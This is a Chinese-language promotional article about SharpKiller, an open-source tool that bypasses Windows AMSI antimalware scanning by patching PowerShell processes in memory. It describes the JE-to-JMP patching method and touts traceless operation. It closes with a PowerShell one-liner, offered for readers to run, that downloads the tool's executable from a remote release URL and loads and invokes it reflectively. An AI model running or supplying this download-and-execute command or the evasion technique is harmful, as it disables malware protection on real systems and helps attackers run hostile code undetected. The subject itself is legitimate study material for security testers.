探秘安全世界：SharpKiller——强大的AMSIAPI绕过工具

SharpKiller是一款由@ZeroMemoryEx移植到.NET Framework 4.8的开源项目，专门用于绕过Windows的安全特性——AMSIAntimalware Scan Interface（AMSIS）。这个强大的工具通过实时扫描和自动修补PowerShell进程，确保你的命令行操作不会被AMSIS拦截。

项目介绍

SharpKiller的工作原理是通过扫描特定的opcode模式，定位并修改AMSIS的关键跳转指令，从而达到绕过检测的目的。项目包含了最新的功能，如每半秒检查一次新的PowerShell进程，并能自动化地对新实例进行修补。

项目技术分析

在技术层面上，SharpKiller利用了动态指令寻址的技术，寻找je amsi的指令序列。一旦找到目标位置，它会将JE指令替换为JMP，使得程序直接跳过安全检查。这种精确且灵活的方法使其在面临目标数据集更新或改动时依然有效。

项目及技术应用场景

对于渗透测试者、安全研究人员以及需要在不受限环境中运行脚本的开发者来说，SharpKiller是一个不可或缺的工具。它可以让你执行某些特定命令，而不触发系统的反恶意软件响应。此外，在需要执行特殊任务或者测试系统安全性的情境下，SharpKiller也表现得相当有用。

项目特点

1. 实时监控: SharpKiller能够实时监控新的PowerShell进程，并自动对其进行修补，确保操作的安全性。
2. 高效扫描: 使用精确的opcode匹配，即使目标代码有变动也能快速定位关键点。
3. 无需持久化: 提供了一行命令以反射加载的方式运行，不留下痕迹。
4. 简单易用: 界面简洁，提供清晰的演示视频，便于理解和部署。

查看项目的源码和视频演示，体验如何摆脱AMSIS的束缚，安全地执行你需要的操作。但是，请记住，任何绕过安全机制的行为都应遵循道德准则和法律法规。

$url = "https://github.com/S1lkys/SharpKiller/releases/download/1.1/Sharp-Killer.exe";
$cli = New-Object System.Net.WebClient;
$sk=[System.Reflection.Assembly]::Load([byte[]]( $cli.DownloadData($url)));
$vars = New-Object System.Collections.Generic.List[System.Object];
$BindingFlags= [Reflection.BindingFlags] "NonPublic,Static";
$sk.EntryPoint.Invoke($null,@(,$passed));

一键执行，享受更自由的技术探索之旅。在使用过程中，如有问题或建议，欢迎向项目贡献者反馈。